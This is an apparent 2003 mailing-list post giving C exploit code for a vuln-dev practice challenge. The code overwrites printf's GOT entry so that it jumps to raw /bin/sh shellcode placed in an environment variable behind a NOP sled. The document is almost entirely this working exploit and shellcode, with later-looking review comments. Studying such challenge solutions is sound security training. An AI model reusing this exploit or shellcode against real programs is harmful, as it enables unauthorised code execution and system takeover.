[Vuln-dev Challenge] example exploit for 2

From: otat_private
Date: Sat May 24 2003 - 09:18:47 PDT


    example exploit for vuln-dev challenge 2, requires the address
    of the shellcode in the environment as an argument
    
    /*
     * example exploit code for vuln-dev challenge 2
     *
     * we overwrite printf's got table entry to point to our
     * shellcode in the environment
     *
     * omicron tau - otat_private
     */
    
    /*
     * objdump, grep, and awk need to be in your path
     *
     * tested on linux 2.4.20 using env address 0xbfffe2ac
     *
     * rm db.log first
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    #define VULNPATH        "./vdc2"                /* path to vulnerable
    binary */
    
    /*
     * /bin/sh
     *
     * Raw x86 payload as supplied in the original post.  Its length is taken
     * with strlen() in main(), so it must contain no NUL byte (it does not);
     * the bytes following "/bin/sh" look like scratch/filler for the string
     * setup the stub performs -- NOTE(review): not verified, treat as opaque.
     */
    char shellcode[]=
        "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d"
        "\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b"
        "\x8d\x56\x13\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
        "\x73\x68\x38\x2d\x69\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62"
        "\x63\x64\x65";
    
    /*
     * GOT entry address for printf, filled in by find_got_addr() and copied
     * 4 bytes at a time into the first argv by main().  An unsigned int is
     * used as the address type, so this is a 32-bit-only layout.
     */
    unsigned int go;        /* GOT entry address for printf */
    
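    /*
     * Resolve printf's GOT slot in VULNPATH and store it (minus 2) in the
     * global `go`.
     *
     * The lookup shells out to `objdump -R | grep | awk` through popen(3),
     * i.e. via /bin/sh.  VULNPATH is a compile-time literal, so the command
     * string carries no runtime-controlled text.  The original parsed the
     * pipeline output without checking that popen() or fgets() succeeded,
     * which silently yielded a bogus address; all failures now exit with a
     * message on stderr.
     *
     * Side effect: writes `go` and prints the chosen address to stdout.
     */
    void
    find_got_addr(void)
    {
            FILE *p;
            char cmd[256];
            char line[1024];
            char *end;
    
            snprintf(cmd, sizeof(cmd), "objdump -R %s | grep ' printf' | "
                "awk '{ print \"0x\"$1 }'", VULNPATH);
            p = popen(cmd, "r");
            if (p == NULL) {
                    perror("popen");
                    exit(1);
            }
            /* a NULL here means the pipeline produced no line at all
             * (no printf relocation, or objdump missing from PATH) */
            if (fgets(line, sizeof(line), p) == NULL) {
                    fputs("vdc2x: no printf relocation found\n", stderr);
                    pclose(p);
                    exit(1);
            }
            pclose(p);
    
            go = strtoul(line, &end, 0);
            if (end == line) {
                    fputs("vdc2x: could not parse got address\n", stderr);
                    exit(1);
            }
            /* NOTE(review): the -2 offset is unexplained in the original
             * (commented only ";;"); presumably it compensates for how vdc2
             * consumes the argument -- confirm against the challenge binary */
            go -= 2;
    
            printf("[!] using got addr 0x%x\n", go);
    }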
    
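    /*
     * Build the two arguments and the environment for VULNPATH and exec it.
     *
     * argv[1]: address of the shellcode inside the environment, given as a
     *          number (strtoul base 0, so "0x..." works).  It is now checked
     *          to be a complete numeric token instead of silently becoming 0.
     *
     * Layout (unchanged from the original, offsets matter):
     *   obuf   - 128 bytes of `go` repeated every 4 bytes, then a NUL.
     *   envbuf - 8192 bytes of 0x90 with the shellcode copied in at offset
     *            8000, NUL-terminated, exported as $SC.
     *   scbuf  - the 4 raw bytes of scaddr, NUL-terminated.
     *
     * Returns 1 (after perror) only if setenv() or execl() fails; on success
     * the process image is replaced and nothing returns.
     */
    int
    main(int argc, char *argv[])
    {
    	char envbuf[8192];
    	char obuf[129];
    	char scbuf[5];
    	unsigned int scaddr;
    	char *end;
    	size_t i;
    
    	if (argc < 2) {
    		fputs("vdc2x: usage: vdc2x scaddr\n", stderr);
    		exit(1);
    	}
    	scaddr = strtoul(argv[1], &end, 0);
    	if (end == argv[1] || *end != '\0') {
    		fputs("vdc2x: scaddr must be a number\n", stderr);
    		exit(1);
    	}
    
    	find_got_addr();
    
    	/* size_t index: sizeof() is unsigned, the original compared a signed int */
    	memset(obuf, 0, sizeof(obuf));
    	for (i = 0; i < sizeof(obuf) - 1; i += 4)
    		memcpy(&obuf[i], &go, 4);
    	obuf[sizeof(obuf) - 1] = 0;
    
    	/* strlen() is safe here only because shellcode[] contains no NUL byte */
    	memset(envbuf, 0x90, sizeof(envbuf));
    	memcpy(&envbuf[8000], shellcode, strlen(shellcode));
    	envbuf[sizeof(envbuf) - 1] = 0;
    	if (setenv("SC", envbuf, 1) != 0) {
    		perror("setenv");
    		return 1;
    	}
    
    	memcpy(scbuf, &scaddr, 4);
    	scbuf[4] = 0;
    	/* the variadic terminator must be a pointer, not a bare 0/NULL int */
    	execl(VULNPATH, "./vdc2", obuf, scbuf, (char *)NULL);
    
    	/* only reached if the exec itself failed */
    	perror("execl");
    	return 1;
    }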
    
    
    
    
    


